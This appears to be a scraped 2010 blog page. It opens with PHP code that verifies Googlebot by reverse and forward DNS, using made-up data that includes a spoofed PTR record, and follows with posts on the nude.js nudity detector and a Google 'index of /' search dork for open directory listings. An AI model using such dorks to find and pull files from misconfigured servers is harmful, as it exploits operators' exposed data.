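// Constructed DNS data (documentation address ranges, made-up host names).
$ptrTable = [
    '192.0.2.10'   => 'crawl-192-0-2-10.googlebot.com',
    '198.51.100.7' => 'dsl-7.example.net',
    '203.0.113.5'  => 'fake.googlebot.com',   // PTR set by whoever controls that address block
];
$fwdTable = [
    'crawl-192-0-2-10.googlebot.com' => ['192.0.2.10'],
    'dsl-7.example.net'              => ['198.51.100.7'],
];
$ptr = function (string $ip) use ($ptrTable) { return $ptrTable[$ip] ?? $ip; };
$fwd = function (string $h) use ($fwdTable) { return $fwdTable[$h] ?? false; };

$ua = 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)';
foreach (array_keys($ptrTable) as $ip) {
    printf("%-14s %s\n", $ip,
        is_verified_googlebot($ua, $ip, $ptr, $fwd) ? 'crawler access' : 'normal login rules');
}
```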
2010-12-24T18:01:00+05:45
Cool Samar
Labels:
browser,
browser addons,
google hacking,
hacking,
internet,
mozilla firefox,
security bypass,
tricks and tips,
web
Sunday, 21 November 2010
Nude.js - Nudity detection with javascript and HTMLCanvas
Today I came across an interesting page on nudity detection with JavaScript and HTMLCanvas. nude.js is an open source script that would be pretty useful for client-side nudity detection in child filters and on social media platforms.
nude.js is a JavaScript implementation of a nudity scanner based on approaches from research papers. HTMLCanvas makes it possible to analyse image data and afterwards decide whether it should be displayed or not. The detection algorithm runs at the client, therefore it's possible (with user interaction) to display the image even if it's identified as nude (false positive).
You can download nude.js from HERE.
For the demo, visit this page.
2010-11-21T19:39:00+05:45
Cool Samar
Labels:
internet,
useful website,
web
Saturday, 9 October 2010
Searching flash games using Google Search trick
Another Google trick: this one can be used to search for any flash games (swf files) you want to play.
So you just played a flash game which was really cool and you want to download it to your computer? You can use Google's search trick to search for any flash game you want.
This trick relies on the way directory listing is done in the web server's directories. Whenever a default index page or a setting that denies directory listing is not in place on the web server, we can view the files in the directory. I'm not going into further detail on this; instead, I'm going to show you how to perform the Google search for finding whatever flash game you want.
I need the game called gravity, which is very fun to play. Now I do the search as below to find it:
"index of /" "last modified" "parent directory" swf gravity
You can replace gravity with the name of the flash game you want to search for and download.
Have fun with this google trick. :)
2010-10-09T22:01:00+05:45
Cool Samar
Labels:
beginner,
google hacking,
internet,
tricks and tips,
web